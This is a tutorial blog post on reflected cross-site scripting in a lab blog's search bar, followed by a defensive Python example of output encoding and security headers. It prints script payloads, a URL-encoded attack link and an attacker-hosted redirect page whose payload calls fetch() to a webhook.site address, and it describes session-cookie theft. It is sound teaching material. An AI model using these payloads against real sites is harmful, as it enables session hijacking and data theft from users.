Cross Site Scripting (XSS) is a web attack that runs arbitrary JavaScript in the context of the user’s browsing session. Because the injected script runs with the vulnerable site’s origin, the cookies it can reach are the ones that site has stored in the victim’s browser. Attackers using XSS against a victim can make the victim’s browser execute JavaScript code. For example, attackers can potentially use XSS to make a victim travel to a malicious domain, change their email address, or send their sensitive cookies (or other data) to a malicious web server for collection.
Our First Example Of XSS
Analyze the images below
In the above images, XSS was found in the search bar of a blog. I injected `<script>prompt("Is This XSS???")</script>` into the search bar of the blog. Afterwards, a prompt alert is displayed on the screen, and the XSS payload is reflected in the search parameter in the URL. This is known as Reflected XSS. Let’s look at the page source to see where the XSS is taking place.
If you look at the above small cut-out of the page source of the blog web page, our malicious `<script></script>` gets injected into a header tag. The specific HTML is this:
```html
<h1>0 search results for '<script>prompt("Is This XSS???")</script>'</h1>
```
This is called Reflected XSS into HTML Context. Our XSS payload is injected into the part of the HTML that reflects the user’s search query back to them on the page.
How Would An Attacker Send The XSS Payload To The Victim?
The attacker could send this link with the URL-encoded payload to the victim (https://0a14002e046c635e83201e50006d006a.web-security-academy.net/?search=%3Cscript%3Eprompt%28%22Is+This+XSS%3F%3F%3F%22%29%3C%2Fscript%3E) and if the victim visits the link the JavaScript will execute in the context of the victim’s browser. This specific XSS payload will make “Is This XSS???” alert to the victim’s screen.
The attacker could also host the following malicious HTML on their domain, and when the victim visits the attacker’s webpage, the victim’s browser will travel to the location in the link and execute the JavaScript. This specific JavaScript alerts “This is XSS” to the victim’s screen and then makes the victim send a GET request to the attacker’s malicious server with a parameter+value of “msg=xss-confirmed”.
```html
<!DOCTYPE html>
<html>
<body>
<script>
window.location.href = "https://0a14002e046c635e83201e50006d006a.web-security-academy.net/?search=%3Cscript%3Ealert%28%22This%20is%20XSS%22%29%3Bfetch%28%22https%3A%2F%2Fwebhook%2Esite%2Ff4a05f1e%2D0bcd%2D4083%2D9769%2D25f5bce3d45e%3Fmsg%3Dxss%2Dconfirmed%22%29%3C%2Fscript%3E";
</script>
</body>
</html>
```
For context, this is what the victim user would see on their screen after traveling to the attacker’s malicious domain where the above html proof of concept is hosted:
Victim’s View
Attacker’s View
And this is what the attacker would see on their malicious server after the XSS payload is executed in the victim’s browser:
Obviously, no sensitive data was sent over with this XSS payload. However, if other misconfigurations were present on the target website, an attacker could have made the victim user send their session cookie to the attacker’s server. The attacker could then use the victim’s session cookie to conduct session hijacking on the victim user’s account, which essentially means the attacker would be able to be logged in as the victim user.
Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous vulnerabilities in modern web applications due to its ability to execute arbitrary JavaScript in the victim’s browser. As demonstrated, attackers can exploit poorly sanitized input to inject payloads that execute in the context of a user’s session, potentially exposing sensitive data such as cookies, session tokens, or personal information.
The technical impact of XSS goes beyond simple proof-of-concept alerts — it enables attackers to perform session hijacking, force unauthorized actions via CSRF, exfiltrate data, and even deploy more complex attacks such as browser-based keyloggers or malware delivery. This underscores the importance of robust input validation and output encoding practices, along with the implementation of Content Security Policy (CSP), HTTP-only cookies, and other defense-in-depth mechanisms.
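To make the fix concrete, here is an added example (not code from the lab or from this article) that models the blog’s search page: the same `<h1>` template rendered once with the raw query, as the vulnerable page does, and once with HTML-entity output encoding, plus the defense-in-depth headers just mentioned. The lab URL is the one quoted above; the `render_*` and `hardened_response_headers` functions and the cookie and CSP values are assumptions for illustration.

```python
import html
from urllib.parse import parse_qs, urlparse

# The lab link quoted in the article, carrying the URL-encoded payload.
SAMPLE_URL = ("https://0a14002e046c635e83201e50006d006a.web-security-academy.net/"
              "?search=%3Cscript%3Eprompt%28%22Is+This+XSS%3F%3F%3F%22%29%3C%2Fscript%3E")


def search_param(url: str) -> str:
    """Decode the ?search= value exactly as the server sees it ('+' becomes a space)."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return params.get("search", [""])[0]


def render_vulnerable(query: str, count: int = 0) -> str:
    """Reflects the raw query into the heading: this is the bug the lab demonstrates."""
    return f"<h1>{count} search results for '{query}'</h1>"


def render_safe(query: str, count: int = 0) -> str:
    """Same template, but the query is entity-encoded for HTML element context,
    so < > & " ' can no longer open a tag or break out of the text node."""
    return f"<h1>{count} search results for '{html.escape(query, quote=True)}'</h1>"


def contains_script_tag(rendered: str) -> bool:
    """Crude regression check a defender can run over rendered output."""
    return "<script" in rendered.lower()


def hardened_response_headers() -> dict:
    """Illustrative (assumed) values for the controls named in the conclusion:
    a restrictive CSP and a session cookie the page's scripts cannot read."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "session=PLACEHOLDER_SESSION_ID; HttpOnly; Secure; SameSite=Lax",
    }


if __name__ == "__main__":
    q = search_param(SAMPLE_URL)
    print("vulnerable:", render_vulnerable(q))
    print("encoded:   ", render_safe(q))
    print("script tag survives encoding?", contains_script_tag(render_safe(q)))
```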
By understanding the anatomy of XSS attacks and their potential consequences, security professionals and developers can take a proactive approach to detect, mitigate, and prevent this vulnerability, ensuring a safer web for users.
Thanks for reading, and if you learned something, THANK YOU FOR LEARNING!
Check out my other articles below, say Hi in the comments, and click that clap button for me please =)